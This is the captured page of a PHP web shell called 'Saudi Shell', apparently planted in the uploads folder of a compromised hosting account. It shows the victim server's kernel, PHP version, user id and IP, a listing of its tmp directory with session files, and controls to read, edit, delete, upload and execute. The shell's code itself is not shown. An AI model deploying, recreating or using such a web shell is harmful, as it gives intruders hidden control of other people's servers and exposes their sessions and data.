Saudi Shell
OS : Linux cld21.cloud-servers.net 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64   [ Google ]   [ exploit-db ]
safe_mode: OFF
disable_functions : exec,passthru,shell_exec,system
Server : Apache
PHP version : 8.1.34
Id : user = w0323med | uid= 1087 | gid= 1089
Pwd : /home/w0323med/public_html/uploads/meetnvisit  drwxr-xr-x  [ Home ]


Your ip : 216.73.216.1    | ip server : 37.27.141.47 |  list site |  phpinfo |

Your path :  /home/w0323med/tmp/

NameSizeModifyOwner/GroupPermissionsOption
[ . ]dir2025-04-15 16:18:26w0323med/w0323meddrwxr-xr-x   0755R - C - rm
[ .. ]dir2025-04-17 02:32:21w0323med/w0323meddrwx--x--x   0711R - C - rm
[ analog ]dir2026-03-14 13:41:27w0323med/w0323meddrwx------   0700R - C - rm
[ awstats ]dir2026-03-14 13:41:36w0323med/w0323meddrwx------   0700R - C - rm
[ horde ]dir2023-09-12 05:58:35w0323med/w0323meddrwx------   0700R - C - rm
[ pma_template_compiles_w0323med ]dir2023-05-25 08:35:36w0323med/w0323meddrwxr-x---   0750R - C - rm
[ webalizer ]dir2026-03-14 13:43:50w0323med/w0323meddrwx------   0700R - C - rm
[ webalizerftp ]dir2023-03-06 07:31:21w0323med/w0323meddrwx------   0700R - C - rm
sess_0c0fcd73405a29a73b5ecf5d511b51fe5.202025-04-15 18:10:51w0323med/w0323med-rw-------   0600E - R - C - D - rm
sess_101cb8ea8c8ac3802629cfa1737126112.702023-09-11 08:12:10w0323med/w0323med-rw-------   0600E - R - C - D - rm
sess_52cc357c242d67c986a4dd7168e1fd225.182025-04-06 15:02:02w0323med/w0323med-rw-------   0600E - R - C - D - rm
sess_94f68ce34d0e0fc588709bbf62df75675.302023-09-05 06:07:24w0323med/w0323med-rw-------   0600E - R - C - D - rm
sess_ebd4f7aa55a42453e7e975c7b3f078757.962025-04-15 13:21:23w0323med/w0323med-rw-------   0600E - R - C - D - rm




Change dir :
Make dir :
read file :
Make file :
Execute :
Upload file :